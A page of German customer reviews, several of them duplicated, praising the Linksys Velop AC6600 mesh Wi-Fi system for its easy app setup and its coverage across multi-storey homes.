  11. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Ich habe das linksys velop system für anwendungen mit hoher bandbreite und niedriger latenz (videotelefonie, streaming/sat-ip) gekauft und die bestehenden mimo-accesspoints ersetzt. Insgesamt sind 4 (2x 2er set) velops im einsatz. Die velops werden an einem router betrieben. Räumliche vorgaben:4 stockwerke (keller, eg, 1. Stock, speicher) mit 350qm, terrasse, balkon, gartenanordnung:je stockwerk 1 velop. Router im keller via lan kabel mit velop verbunden. Velop im eg via lan kabel verbunden, 1. Stock und speicher drahtlosanwendung:sat-ip für 4 endgeräte, video-on-demand (netflix+prime), facetime ip-telefonie, v smarthome-steuerung, surfen/emailbewertung:das koppeln der velops funktioniert unter ios via app komfortabel und problemlos. Der vorgang nimmt jedoch einige zeit in anspruch, da die geräte im anschluss noch updates einspielen. Insgesamt dauert das einrichten eines neuen velops c.
    1. Nach eine lange suche habe ich für das velop entschieden als ersatz für die integrierte wifi meines horizon recorder (unitymedia). Ich habe der 2er set gekauft, in sinne für zukünftige upgrades falls nötig. Ich habe keinerlei probleme beim setup wie bei vielen hier berichtet. Über der linksys app (ios) perfekt gelaufen. 09 laufen beide towers non-stop. Geräte wechseln problemlos zwischen der tower mit beste/stärkste empfahg (2x ipad air 2, 2x iphone 6s, 1x macbook pro, 1x macbook, 1x apple watch, 1x lenovo pc). Via ethernet: appletv, ps4, hp drucker). Die apple geräte bleiben meistens in die 5ghz band. Die windows-kiste leider ist nicht so schlau. Wifi ist schnell erkannt und auf beide towers messe ich die volle geschwindigkeit meinen internet (200 mbps), am pc via speedtest.
  12. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Nach eine lange suche habe ich für das velop entschieden als ersatz für die integrierte wifi meines horizon recorder (unitymedia). Ich habe der 2er set gekauft, in sinne für zukünftige upgrades falls nötig. Ich habe keinerlei probleme beim setup wie bei vielen hier berichtet. Über der linksys app (ios) perfekt gelaufen. 09 laufen beide towers non-stop. Geräte wechseln problemlos zwischen der tower mit beste/stärkste empfahg (2x ipad air 2, 2x iphone 6s, 1x macbook pro, 1x macbook, 1x apple watch, 1x lenovo pc). Via ethernet: appletv, ps4, hp drucker). Die apple geräte bleiben meistens in die 5ghz band. Die windows-kiste leider ist nicht so schlau. Wifi ist schnell erkannt und auf beide towers messe ich die volle geschwindigkeit meinen internet (200 mbps), am pc via speedtest.
  13. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Seit wir neue fenster im haus hatten, funktionierte meine vorherige wlan-lösung überhaupt nicht mehr (betondecke). Also musste ein gescheiter ersatz her. Auch wollte ich einen reibungslosen Übergang zwischen den drei etagen. Seit ich auf jeder etage ein modul stehen habe, funktioniert alles reibungslos. Die verarbeitung sieht solide aus und hat einen gewissen style (da keine abstehende atenne).
    1. Seit wir neue fenster im haus hatten, funktionierte meine vorherige wlan-lösung überhaupt nicht mehr (betondecke). Also musste ein gescheiter ersatz her. Auch wollte ich einen reibungslosen Übergang zwischen den drei etagen. Seit ich auf jeder etage ein modul stehen habe, funktioniert alles reibungslos. Die verarbeitung sieht solide aus und hat einen gewissen style (da keine abstehende atenne).
  14. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Eine super möglichkeit, um das wlan -netz zu erweitern. Das einrichten klappte ohne probleme. Falls man eine portfreigabe für ein wlan-gerät braucht, muss man bedenken, diese auch im router einzustellen. Datenübertragungsrate ist top.
  15. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Eine super möglichkeit, um das wlan -netz zu erweitern. Das einrichten klappte ohne probleme. Falls man eine portfreigabe für ein wlan-gerät braucht, muss man bedenken, diese auch im router einzustellen. Datenübertragungsrate ist top.
  16. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Gut und sicher verpackt kommen das modulsystem ins haus. Die beiden tower sind richtig schick, gut verarbeitet und wirken gerade in hellen häusern oder räumen mit viel weiß sehr edel. Die installation ging schnell und sollte auch für neueinsteiger/laien möglich sein, allerdings funktioniert hier alles nur über mobile geräte bzw. Am pc wäre eine schnittstelle ebenfalls wünschenswert. Die routerqualität an sich ist wirklich gut und funktioniert auch über zwei stockwerke. Hier gibt es nichts zu meckern. Preislich ist das system mit 250 euro schon nicht günstig, aber man erhält qualität.
    1. Gut und sicher verpackt kommen das modulsystem ins haus. Die beiden tower sind richtig schick, gut verarbeitet und wirken gerade in hellen häusern oder räumen mit viel weiß sehr edel. Die installation ging schnell und sollte auch für neueinsteiger/laien möglich sein, allerdings funktioniert hier alles nur über mobile geräte bzw. Am pc wäre eine schnittstelle ebenfalls wünschenswert. Die routerqualität an sich ist wirklich gut und funktioniert auch über zwei stockwerke. Hier gibt es nichts zu meckern. Preislich ist das system mit 250 euro schon nicht günstig, aber man erhält qualität.
  17. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Wir leben in einem altbau mit erdgeschoss, obergeschoss und keller. Gesurft wird bei uns von allen familienmitgliedern und auf allen ebenen. Auch das fernsehen läuft bei uns übers internet. Bisher gab es immer wieder probleme bei der betrachtung von videos oder beim download und upload größerer dateien. Dank dem linksys velop tri-band wlan modulsystem ac6600 klappt jetzt alles wie am schnürchen, anfänglich war ich jedoch sehr skeptisch. Alle bereiche sind sehr gut abgedeckt und jeder kann nun endlich uneingeschränkt surfen. Die installation war für mich als laien etwas nervzehrend, daher gibt es einen stern abzug. Bei drei modulen hat es etwas, bis alles durch war, ansonsten ist das linksys velop tri-band wlan modulsystem ac6600 wirklich eine geniale sache.
  18. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Wir leben in einem altbau mit erdgeschoss, obergeschoss und keller. Gesurft wird bei uns von allen familienmitgliedern und auf allen ebenen. Auch das fernsehen läuft bei uns übers internet. Bisher gab es immer wieder probleme bei der betrachtung von videos oder beim download und upload größerer dateien. Dank dem linksys velop tri-band wlan modulsystem ac6600 klappt jetzt alles wie am schnürchen, anfänglich war ich jedoch sehr skeptisch. Alle bereiche sind sehr gut abgedeckt und jeder kann nun endlich uneingeschränkt surfen. Die installation war für mich als laien etwas nervzehrend, daher gibt es einen stern abzug. Bei drei modulen hat es etwas, bis alles durch war, ansonsten ist das linksys velop tri-band wlan modulsystem ac6600 wirklich eine geniale sache.

Comments are closed.